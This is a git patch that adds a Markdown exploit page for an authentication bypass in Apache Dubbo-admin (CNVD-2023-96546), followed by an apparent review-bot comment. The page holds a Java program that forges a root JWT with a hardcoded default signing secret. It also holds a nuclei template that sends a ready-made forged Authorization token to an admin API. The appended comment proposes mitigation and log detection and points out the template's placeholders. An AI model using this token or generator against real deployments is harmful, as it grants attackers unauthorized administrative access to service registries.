From 9b6955784916defa469bd1edc12d3f502fd97726 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 17 Jan 2024 19:17:40 +0800
Subject: [PATCH] Create Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md
---
...min-authorized-bypass (CNVD-2023-96546).md | 71 +++++++++++++++++++
1 file changed, 71 insertions(+)
create mode 100644 Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md
diff --git a/Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md b/Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md
new file mode 100644
index 0000000..3dfa011
--- /dev/null
+++ b/Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md
@@ -0,0 +1,71 @@
+## Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546)
+
+
+## exp
+```java
+package org.apache.dubbo.admin.controller;
+
+import io.jsonwebtoken.Jwts;
+import io.jsonwebtoken.SignatureAlgorithm;
+
+import java.util.Date;
+import java.util.HashMap;
+import java.util.Map;
+
+public class jwt {
+ public static String generateToken(String rootUserName) {
+ String secret = "86295dd0c4ef69a1036b0b0c15158d77";
+ Long timeStamp = 9999999999999L;
+ Date date = new Date(timeStamp);
+ final SignatureAlgorithm defaultAlgorithm = SignatureAlgorithm.HS512;
+ Map claims = new HashMap<>(1);
+ claims.put("sub", rootUserName);
+ return Jwts.builder()
+ .setClaims(claims)
+ .setExpiration(date)
+ .setIssuedAt(new Date(System.currentTimeMillis()))
+ .signWith(defaultAlgorithm, secret)
+ .compact();
+ }
+ public static void main(String[] args) {
+ String root = jwt.generateToken("root");
+ System.out.println(root);
+
+
+ }
+}
+```
+
+## nuclei
+```
+id: dubbo-admin_Unauthorized_bypass
+info:
+ name: Template Name
+ author:
+ severity: medium
+ description: dubbo-admin Unauthorized access bypass
+ reference:
+ - https://
+ tags: apache,dubbo-admin
+requests:
+ - raw:
+ - |+
+ GET /api/dev/consumers HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */*
+ Authorization: eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjk5OTk5OTk5OTksInN1YiI6InJvb3QiLCJpYXQiOjE2OTkwODM2Mzd9.wKRqJkWxr_nVDcVVF5rniqhnACtqaDnYUUu55g-atkIwRIt1A-SMpKqBN5zrGZl4kFVcrjzMvXsYqfqf0N9Gbg
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+ Referer: http://{{Hostname}}/
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+ Connection: close
+
+ matchers:
+ - type: word
+ part: header
+ words:
+ - 'HTTP/1.1 200 '
+```
+
+## 漏洞来源
+- https://mp.weixin.qq.com/s/Wsdx_qi1PeiDwbF_YadoOQ
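Review bot: The new file gives no root cause, affected-condition or remediation text. The `secret` literal in the `## exp` listing only validates where a deployment still signs its JWTs with the key shipped in dubbo-admin's default configuration (to my knowledge the `admin.check.signSecret` property; confirm against the deployed config), and the page should say so. I would add a `## Mitigation` section after the title, with one sentence naming the default signing key as the cause and one telling operators to set a unique random secret per deployment and restart so tokens signed with the old key stop validating. For detection, the fixed token in the `## nuclei` request decodes to `sub` = `root` with `exp` = 9999999999, so that exact `Authorization` value, or any token with a far-future expiry, is worth searching for in proxy or WAF logs that record the header. The template's `name: Template Name`, empty `author:` and `- https://` reference are unfilled placeholders, and because the matcher keys only on `'HTTP/1.1 200 '` a hit should be confirmed manually before it is reported as this issue.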